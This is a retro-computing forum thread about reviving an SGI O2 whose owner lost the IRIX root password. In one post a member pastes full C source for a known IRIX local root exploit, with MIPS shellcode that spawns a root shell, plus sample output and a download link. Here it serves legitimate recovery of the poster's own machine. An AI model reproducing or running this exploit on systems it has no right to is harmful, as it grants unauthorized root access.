Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Lucy Runs! :)
#31
Re: Lucy Runs! :)
Also check out Dina, it will allow a network install by hosting the VM on a PC or Mac. Although you'll need something that can mount IRIX CDs and read the EFS file system on them. When I set up Dina myself, I used my Indigo2 to read the disks, so I don't have experience of reading them on a PC or Mac.

Root passwords can be removed, but you need either a second SGI, or a second disk with IRIX on it. I'd advise not wiping the HDD if you can in case it has some nice software on it. Better to get a replacement disk, get IRIX onto it somehow, then remove the root password from your current HDD.

The lack of a display could be due to either a res/refresh rate your monitor doesn't support, or IRIX is running in headless mode. You'll need single user access to fix though...
 Indigo2 IMPACT R10000 195MHz, 384MB RAM, SolidIMPACT, 36GB 15k & 300GB 10k drives, new/quiet fans, IRIX 6.5.22
Fuel R14000 600MHz, 4GB RAM, V10 Graphics, 72GB 15k & 300GB 10k drives, new/quiet fans, IRIX 6.5.30
O2 in storage...
Trippynet Offline
Indigo2 IMPACT

Posts: 75
Threads: 0
Joined: Dec 2017
Find Reply
08-22-2018, 08:10 PM
#32
Re: Lucy Runs! :)
I have a similar error on startup for my octan “hw/node/xtalk/...” but everyone works perfect. This came up after installing a fresh version of Irix after repartitioning the hard drive.

I don’t know what it means, but I don’t have any other issues. I will monitor this thread hoping some chimes in with a possible solution.
Octane 2x400mhz R12000A Octane, MXE, 4gig Ram

1600SW O2 400mhz R12000 O2, 1gig Ram AV1 - 250gig Media' raid

Indy 180mhz R5000 Indy XZ 256mb ram

Intel i7-990x 3.46GHz Extreme 6 core / Quadro 5000 & 2 x Tesla C2075 / 24gig Ram

Belkin Omniview SE Pro 4 port KVM connecting all 4 systems displaying on one 27" BenQ Zowie monitor.
bjames Offline
Octane

Posts: 172
Threads: 42
Joined: Aug 2018
Find Reply
08-22-2018, 11:23 PM
#33
Re: Lucy Runs! :)
finally i'm in the system :) no errors on startup anymore ;)
i changed to another keyboard and another mouse(original ps2, before that i used usb with adapter->worked in prom but didn't boot into irix)
when i started the system today without a mouse it finally came up ->EUREKA!
now i need to see if i can change the root pw or i really have to reinstall... but so far the system runs very well!!! :)
PacMaN_2k1 Offline
O2

Posts: 37
Threads: 5
Joined: Aug 2018
Find Reply
08-23-2018, 01:17 PM
#34
Re: Lucy Runs! :)
Check to see if you can log into any accounts, like demos, guest, etc. If you can log in, you might be able to just get root (depending on the version of irix)
gijoe77 Offline
Tezro

Posts: 358
Threads: 23
Joined: Jun 2018
Find Reply
08-23-2018, 01:39 PM
#35
Re: Lucy Runs! :)
yeah i get into guest, demos and another account by the pro owner i think, only root needs pw.
PacMaN_2k1 Offline
O2

Posts: 37
Threads: 5
Joined: Aug 2018
Find Reply
08-23-2018, 01:40 PM
#36
Re: Lucy Runs! :)
it's version 6.5.1.5
PacMaN_2k1 Offline
O2

Posts: 37
Threads: 5
Joined: Aug 2018
Find Reply
08-23-2018, 02:18 PM
#37
Re: Lucy Runs! :)
There are some expliots you can run to gain root, I'm away for a week so if you don't figured it out by then I'll get something to you when I get back home next friday
gijoe77 Offline
Tezro

Posts: 358
Threads: 23
Joined: Jun 2018
Find Reply
08-23-2018, 09:19 PM
#38
RE: Lucy Runs! :)
if the system has a compiler your golden, compile this code 

Code:
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME                                          #*/

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400

char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
    "\x24\x02\x04\x64"    /* li      $v0,1124             */
    "\x03\xff\xff\xcc"    /* syscall                      */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
}

here is what it should look like (this was on a 6.5.22m machine, wont work on 6.5.30):

Code:
bash-4.2$ cc -o foo x.c
bash-4.2$ ./foo localhost:0.0
copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/
libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 IP:ALL

#

If you don't have a compiler, there was a way to compile stuff in earlier versions of irix using the built-in compiler the system uses for building the kernel, but my notes fail me and I don't recall how to do it...

Here is more info for the exploit I posted above:

http://www.mediafire.com/file/i29oebpyr6...ar.gz/file
gijoe77 Offline
Tezro

Posts: 358
Threads: 23
Joined: Jun 2018
Find Reply
09-01-2018, 08:45 AM


Forum Jump:


Users browsing this thread: 1 Guest(s)